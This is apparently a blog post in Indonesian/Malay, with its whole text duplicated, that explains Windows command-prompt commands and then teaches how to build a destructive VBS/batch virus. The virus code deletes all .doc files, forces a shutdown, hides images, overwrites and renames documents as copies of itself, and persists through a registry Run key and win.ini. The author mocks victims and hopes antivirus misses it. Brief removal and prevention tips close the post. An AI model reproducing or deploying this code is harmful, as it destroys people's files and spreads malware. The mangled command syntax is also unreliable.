1.Delete Registry: REG DELETE ALAMAT / v VALUE NAME / f
Keterangan:
- REG DELETE = Menghapus registry
- ALAMAT = Hkey \ Software \ dst
- / V VALUE NAME = Nama Value
- / F = Tidak wajib!! Berfungsi untuk melaksanakan perintah tanpa prompt
Contoh: REG DELETE Hkey \ Software \ Microsoft \ Windows \ Policies \ Explorer / v NoLogOff
Fungsi = Memadam Value NoLogOff Di Alamat Registry Hkey \ Software \ Microsoft \ Windows \ Policies \ Explorer
2.ADD Registry: REG ADD ALAMAT / v VALUE NAME / t TYPE / s SEPARATOR / d DATA / f
Keteranagn:
- REG ADD = Menambah registry
- ALAMAT = Hkey \ Software \ dst
- / V VALUE NAME = Nama Value
- / T TYPE = Type data Ex: REG_DWORD, REG_SZ
- / D DATA = Isi Value
- / F = Tidak wajib!! Berfungsi untuk melaksanakan perintah tanpa prompt
3.PROMPT: PROMPT Text
Keterangan:
PROMPT = Perintah untuk merubah text PROMPT
Text = Text yang ingn kita munculkan di PROMPT
Text boleh menggunakan aksara istimewa yang daftarnya berikut ini!!
$ A = Watak & $ N = Drive kita menginstal windows
$ B = Watak | $ L = Default
$ C = Watak ($ Q = Watak =
$ D = Watak Tarikh Sekarang $ S = Watak Ruang
$ E = Watak Escape Kod $ T = Watak Jam Sekarang
$ F = Watak) $ V = Watak No Versi Windows
$ G = Watak> (lebih besar dari) $ _ = Watak Garis Bawah
$ H = Watak No Text $ $ = Watak Dollar
$ L = Watak <(lebih kecil dari) $ + = Watak Aritmatik
4.Replace: Replace [Drive \ Path \ namafile] [Drive \ Path] / A / P / R / S / L / U
Keterangan:
Replace = Pindah
- [Drive \ Path \ namafile] = Tertentu sumber fail
- [Drive \ Path \] = Folder Objektif
- A = Pindah File ke Folder Objektif (No Update)
- L = Membuat Prompt mengesahkan Kita Sebelum Memindahkan
- R = Pindah hanya File Attribut Read Only
- S = Pindah File Ke Semua Sub Direktori Folder Objektif
- W = Tunggu kita memasukan disk / flashdisk sebelum memindahkan
- U = Pindah dan Update jika nama fail sudah ada
- Jika anda menggunakan parameter / A tidak boleh menggunakan / S / U begitu juga sebaliknya.
5.Attrib: Attrib + R-R + A-A + H-H + S-S ADRESS / S / D
Keterangan:
Attrib = Rubah Attribut File / Folder
- (-) = Untuk Menghapus Attribut
- (+) = Untuk Menambah Attribut
- (A) = Attribut Archieve
- (R) = Attribut Read Only
- (H) = Attribut Hidden
- (S) = Attribut Super_Hidden / System
- / S = Proses terhadap fail yang sama dalam folder dan subfolder
- / D = Proses folder Sebagai Sumber
- Adress = Alamat File Misal: C: \ Lucky \ Ganteng
6.Del: Del / L / F / S / Q / Attribut / Adress
Keterangan:
- Del = Padam File / Folder
- / L = Membuat Prompt mengesahkan Kita Sebelum Padam
- / F = Padam Hanya Read Only File
- / S = Padam File Yang Sama Di Semua Sub Directory
- / Q = Padam Dengan Cepat
- / Attribut = Pilih Attribut File Yang Ingin Di Padam (Tidak Ada Berarti Semua File) tanda (-) bererti yang tidak di padam-- Adress = Alamat File Misal: C: \ Lucky \ Ganteng
7.Rename: Rename / Ren [Drive \ Path \ namafile] NewFileName
Keterangan:
- Rename = Rubah Nama Fail
- [Drive \ Path \ namafile] = Alamat Drive dan Nama Fail
- NewFileName = Nama Fail Baru
8.Type: Type [Drive \ Path \ namafile]
Keterangan:
- Type = Membuka Semua File Text (*. txt, *. doc, *. xls, *. ini, *. vbs, *. js, dll)
- [Drive \ Path \ namafile] = Lokasi File
9.Start: Start ADDRESS_FILE
- Start = Untuk menjalankan File
- ADDRESS_FILE = Alamat file di special folder seperti windows dan system32
- Ex: Start Regedit maka akan menjalankan Registry Editor.
sekarang kita akan membahas file *. bat yang berfungsi untuk menjalankan perintah command prompt secara bersamaan. oke ketikan kod berikut di notepad: date 07-07-07 dan save dengan nama edit_time.bat dan pilih "All File" dalam medan "Save As Type" lalu jalankan!! setelah itu apa yang terjadi?? yah tarikh berubah jadi juli-7-2007.
fail *. bat kita tidak mungkin membuat banyak fail *. bat kerana selain akan cepat dikesan, kita juga akan semakin rumit merubahregistry!! namun jangan kuatir kerana fail *. bat boleh menjalankan perintah DOS / COMMAND_PROMPT secara langsung.
berikut perintah ini, kita buka notepad dan ketikan code berikut:
del C: \ *. doc '- hapus semua file berextensi doc di drive c
Shutdown-s-f-t 30-c "Selamat Tidur" '--s = shutdown computer,-f = tutup semua aplikasi tanpa amaran,-t = setting masa (dalam saat)-c = memaparkan mesej "Selamat Tidur" (Bebas kita ubah)
attrib + s + h C: \ *. jpg / s / d '- beri attribut hidden dan system semua fail jpg
for / R c: \%% r in (*. cob *. doc) do copy% 0 "%% r" '- Copy isi file *. bat ke semua fail *. cob dan *. doc di C
for / R c: \%% r in (*. cob *. doc) do ren "%% r" *. bat '- Rename semua fail *. cob dan *. doc jadi *. bat, sehingga isi file jd virus kita: D haha .. haha
Untuk isi file bat yang akan menumpang di virus vbs kita anda boleh pilih mana yang paling sesuai!! mungkin memadam, shutdown dalam 30 saat, menyembunyikan atau mengubah sebarang isi kandungannya jadi file *. bat?? dipilih!! dipilih!!
atau boleh masukin semuanya sehingga virus kita ditambah kod berikut ini:
Set bath = fso.CreateObject (towind & "\ sialan.bat")
bath.writeline "del C: \ *. doc"
bath.writeline "Shutdown-s-f-t 30"
bath.writeline "for / R c: \%% r in (*. cob *. doc) do copy% 0%% r"
bath.writeline "for / R c: \%% r in (*. cob *. doc) do ren%% r *. bat"
bath.close
'Bonus
wsh.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ Cur rentVersion \ Main \" SysError "," towind & "\ sialan.bat", "REG_SZ"
Maka ketika windows diaktifkan semua fail doc akan menjadi *. bat dengan isi kod penghancur kita: D boleh diselamatkan ga tuh?? coba saja supaya anda tahu!!
Namun jika anda punya anti virus biasanya kod tersebut akan di blok kerana jelas-jelas untuk merosakkan!! lalu bagaimana?? kita berdoa supaya antivirus komputer sasaran tidak mengenali: D karena memang tidak semua antivirus akan memblok perintah tersebut. Oia sebagai tambahan kita boleh membuat fail lain seperti *. html atau *. ini!! jika kita punya banyak salinan virus kita bisa membuat file *. ini supaya orang tidak cepat mengetahui virus kita hanya dengan membuka Regedit. untuk terakhir kali saya akan berikan lagi suatu code yang akan merubah gambar ini diwindows sehingga menjalankan virus kita. oke langsung saja tentunya dengan perintah
set BuatIni = fso.CreateTextFile ("C: \ WINDOWS \ Win.ini")
BuatIni.writeline "[WINDOWS]"
BuatIni.writeline "run = C: \ Ju_Pe.vbs" '- rubah sesuai letak dan nama virus
BuatIni.writeline "load = C: \ Persik.vbs" '- rubah sesuai letak dan nama virus
BuatIni.close
Maka ketika windows dijalankan virus akan aktif!! walaupun mungkin registry telah diubah.
Dari pembahasan kita maka kita boleh simpulkan beberapa langkah berikut jika terkena virus vbs: jika tidak di enkripsi anda boleh melihat dan membunuh semua virus dan membenarkanregistry dengan membaca source kodenya, tapi jika di enkripsi kita lakukan langkah berikut:
1.Matikan proses virus!! anda boleh menggunakan tool pengganti taskmanager yang biasanya akan di blok.
2.Hapus semua salinan virus!! anda boleh gunakan antivirus update terbaru dan jika dihalang virus anda rubah dulu namanya seperti PCMAV_CLN.exe jadi 123.exe
3.Buka registry dan semak dengan teliti semua subkey run automatik biasanya akan terdapat key yang mengarah ke letak virus yang dijalankan dan periksa fail win.ini!! jika dirubah anda minta dari komputer teman anda: D dan jika ada penggunaan letak virus langsung hapus.
4.Rubah semua registry yang dirubah virus!! bisa dengan TuneUp Utilities dan sebagainya!!
Untuk pencegahan lakukan langkah berikut:
1.Gunakan antivirus terbaru, jika boleh yang mempunyai ciri-ciri heuristik seperti ANSAV.
2.Jangan asal klik file!! lihat dikolom type Windows Explorer apabila application tapi iconnya folder atau MS Word langsung hapus.
3.Selalu scan jika mencolokan flaskdisk
4.Matikan proses autorun melalui registry di alamat
"HKCU (atau HKLM) \ Software \ Microsoft \ Windows \ CurrentVersion \ Po licies \ Explorer", buat DWORD value baru dengan nama NoDriveTypeAutoRun dan isi dengan nilai 255. atau melalui start-Main-taip gpedit.msc-User Configuration-pentadbiran Templates - System - Cari Turn Off AutoPlay - klik 2x dan rubah jadi Enabled!!
Keterangan:
- REG DELETE = Menghapus registry
- ALAMAT = Hkey \ Software \ dst
- / V VALUE NAME = Nama Value
- / F = Tidak wajib!! Berfungsi untuk melaksanakan perintah tanpa prompt
Contoh: REG DELETE Hkey \ Software \ Microsoft \ Windows \ Policies \ Explorer / v NoLogOff
Fungsi = Memadam Value NoLogOff Di Alamat Registry Hkey \ Software \ Microsoft \ Windows \ Policies \ Explorer
2.ADD Registry: REG ADD ALAMAT / v VALUE NAME / t TYPE / s SEPARATOR / d DATA / f
Keteranagn:
- REG ADD = Menambah registry
- ALAMAT = Hkey \ Software \ dst
- / V VALUE NAME = Nama Value
- / T TYPE = Type data Ex: REG_DWORD, REG_SZ
- / D DATA = Isi Value
- / F = Tidak wajib!! Berfungsi untuk melaksanakan perintah tanpa prompt
3.PROMPT: PROMPT Text
Keterangan:
PROMPT = Perintah untuk merubah text PROMPT
Text = Text yang ingn kita munculkan di PROMPT
Text boleh menggunakan aksara istimewa yang daftarnya berikut ini!!
$ A = Watak & $ N = Drive kita menginstal windows
$ B = Watak | $ L = Default
$ C = Watak ($ Q = Watak =
$ D = Watak Tarikh Sekarang $ S = Watak Ruang
$ E = Watak Escape Kod $ T = Watak Jam Sekarang
$ F = Watak) $ V = Watak No Versi Windows
$ G = Watak> (lebih besar dari) $ _ = Watak Garis Bawah
$ H = Watak No Text $ $ = Watak Dollar
$ L = Watak <(lebih kecil dari) $ + = Watak Aritmatik
4.Replace: Replace [Drive \ Path \ namafile] [Drive \ Path] / A / P / R / S / L / U
Keterangan:
Replace = Pindah
- [Drive \ Path \ namafile] = Tertentu sumber fail
- [Drive \ Path \] = Folder Objektif
- A = Pindah File ke Folder Objektif (No Update)
- L = Membuat Prompt mengesahkan Kita Sebelum Memindahkan
- R = Pindah hanya File Attribut Read Only
- S = Pindah File Ke Semua Sub Direktori Folder Objektif
- W = Tunggu kita memasukan disk / flashdisk sebelum memindahkan
- U = Pindah dan Update jika nama fail sudah ada
- Jika anda menggunakan parameter / A tidak boleh menggunakan / S / U begitu juga sebaliknya.
5.Attrib: Attrib + R-R + A-A + H-H + S-S ADRESS / S / D
Keterangan:
Attrib = Rubah Attribut File / Folder
- (-) = Untuk Menghapus Attribut
- (+) = Untuk Menambah Attribut
- (A) = Attribut Archieve
- (R) = Attribut Read Only
- (H) = Attribut Hidden
- (S) = Attribut Super_Hidden / System
- / S = Proses terhadap fail yang sama dalam folder dan subfolder
- / D = Proses folder Sebagai Sumber
- Adress = Alamat File Misal: C: \ Lucky \ Ganteng
6.Del: Del / L / F / S / Q / Attribut / Adress
Keterangan:
- Del = Padam File / Folder
- / L = Membuat Prompt mengesahkan Kita Sebelum Padam
- / F = Padam Hanya Read Only File
- / S = Padam File Yang Sama Di Semua Sub Directory
- / Q = Padam Dengan Cepat
- / Attribut = Pilih Attribut File Yang Ingin Di Padam (Tidak Ada Berarti Semua File) tanda (-) bererti yang tidak di padam-- Adress = Alamat File Misal: C: \ Lucky \ Ganteng
7.Rename: Rename / Ren [Drive \ Path \ namafile] NewFileName
Keterangan:
- Rename = Rubah Nama Fail
- [Drive \ Path \ namafile] = Alamat Drive dan Nama Fail
- NewFileName = Nama Fail Baru
8.Type: Type [Drive \ Path \ namafile]
Keterangan:
- Type = Membuka Semua File Text (*. txt, *. doc, *. xls, *. ini, *. vbs, *. js, dll)
- [Drive \ Path \ namafile] = Lokasi File
9.Start: Start ADDRESS_FILE
- Start = Untuk menjalankan File
- ADDRESS_FILE = Alamat file di special folder seperti windows dan system32
- Ex: Start Regedit maka akan menjalankan Registry Editor.
sekarang kita akan membahas file *. bat yang berfungsi untuk menjalankan perintah command prompt secara bersamaan. oke ketikan kod berikut di notepad: date 07-07-07 dan save dengan nama edit_time.bat dan pilih "All File" dalam medan "Save As Type" lalu jalankan!! setelah itu apa yang terjadi?? yah tarikh berubah jadi juli-7-2007.
fail *. bat kita tidak mungkin membuat banyak fail *. bat kerana selain akan cepat dikesan, kita juga akan semakin rumit merubahregistry!! namun jangan kuatir kerana fail *. bat boleh menjalankan perintah DOS / COMMAND_PROMPT secara langsung.
berikut perintah ini, kita buka notepad dan ketikan code berikut:
del C: \ *. doc '- hapus semua file berextensi doc di drive c
Shutdown-s-f-t 30-c "Selamat Tidur" '--s = shutdown computer,-f = tutup semua aplikasi tanpa amaran,-t = setting masa (dalam saat)-c = memaparkan mesej "Selamat Tidur" (Bebas kita ubah)
attrib + s + h C: \ *. jpg / s / d '- beri attribut hidden dan system semua fail jpg
for / R c: \%% r in (*. cob *. doc) do copy% 0 "%% r" '- Copy isi file *. bat ke semua fail *. cob dan *. doc di C
for / R c: \%% r in (*. cob *. doc) do ren "%% r" *. bat '- Rename semua fail *. cob dan *. doc jadi *. bat, sehingga isi file jd virus kita: D haha .. haha
Untuk isi file bat yang akan menumpang di virus vbs kita anda boleh pilih mana yang paling sesuai!! mungkin memadam, shutdown dalam 30 saat, menyembunyikan atau mengubah sebarang isi kandungannya jadi file *. bat?? dipilih!! dipilih!!
atau boleh masukin semuanya sehingga virus kita ditambah kod berikut ini:
Set bath = fso.CreateObject (towind & "\ sialan.bat")
bath.writeline "del C: \ *. doc"
bath.writeline "Shutdown-s-f-t 30"
bath.writeline "for / R c: \%% r in (*. cob *. doc) do copy% 0%% r"
bath.writeline "for / R c: \%% r in (*. cob *. doc) do ren%% r *. bat"
bath.close
'Bonus
wsh.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ Cur rentVersion \ Main \" SysError "," towind & "\ sialan.bat", "REG_SZ"
Maka ketika windows diaktifkan semua fail doc akan menjadi *. bat dengan isi kod penghancur kita: D boleh diselamatkan ga tuh?? coba saja supaya anda tahu!!
Namun jika anda punya anti virus biasanya kod tersebut akan di blok kerana jelas-jelas untuk merosakkan!! lalu bagaimana?? kita berdoa supaya antivirus komputer sasaran tidak mengenali: D karena memang tidak semua antivirus akan memblok perintah tersebut. Oia sebagai tambahan kita boleh membuat fail lain seperti *. html atau *. ini!! jika kita punya banyak salinan virus kita bisa membuat file *. ini supaya orang tidak cepat mengetahui virus kita hanya dengan membuka Regedit. untuk terakhir kali saya akan berikan lagi suatu code yang akan merubah gambar ini diwindows sehingga menjalankan virus kita. oke langsung saja tentunya dengan perintah
set BuatIni = fso.CreateTextFile ("C: \ WINDOWS \ Win.ini")
BuatIni.writeline "[WINDOWS]"
BuatIni.writeline "run = C: \ Ju_Pe.vbs" '- rubah sesuai letak dan nama virus
BuatIni.writeline "load = C: \ Persik.vbs" '- rubah sesuai letak dan nama virus
BuatIni.close
Maka ketika windows dijalankan virus akan aktif!! walaupun mungkin registry telah diubah.
Dari pembahasan kita maka kita boleh simpulkan beberapa langkah berikut jika terkena virus vbs: jika tidak di enkripsi anda boleh melihat dan membunuh semua virus dan membenarkanregistry dengan membaca source kodenya, tapi jika di enkripsi kita lakukan langkah berikut:
1.Matikan proses virus!! anda boleh menggunakan tool pengganti taskmanager yang biasanya akan di blok.
2.Hapus semua salinan virus!! anda boleh gunakan antivirus update terbaru dan jika dihalang virus anda rubah dulu namanya seperti PCMAV_CLN.exe jadi 123.exe
3.Buka registry dan semak dengan teliti semua subkey run automatik biasanya akan terdapat key yang mengarah ke letak virus yang dijalankan dan periksa fail win.ini!! jika dirubah anda minta dari komputer teman anda: D dan jika ada penggunaan letak virus langsung hapus.
4.Rubah semua registry yang dirubah virus!! bisa dengan TuneUp Utilities dan sebagainya!!
Untuk pencegahan lakukan langkah berikut:
1.Gunakan antivirus terbaru, jika boleh yang mempunyai ciri-ciri heuristik seperti ANSAV.
2.Jangan asal klik file!! lihat dikolom type Windows Explorer apabila application tapi iconnya folder atau MS Word langsung hapus.
3.Selalu scan jika mencolokan flaskdisk
4.Matikan proses autorun melalui registry di alamat
"HKCU (atau HKLM) \ Software \ Microsoft \ Windows \ CurrentVersion \ Po licies \ Explorer", buat DWORD value baru dengan nama NoDriveTypeAutoRun dan isi dengan nilai 255. atau melalui start-Main-taip gpedit.msc-User Configuration-pentadbiran Templates - System - Cari Turn Off AutoPlay - klik 2x dan rubah jadi Enabled!!
No comments:
Post a Comment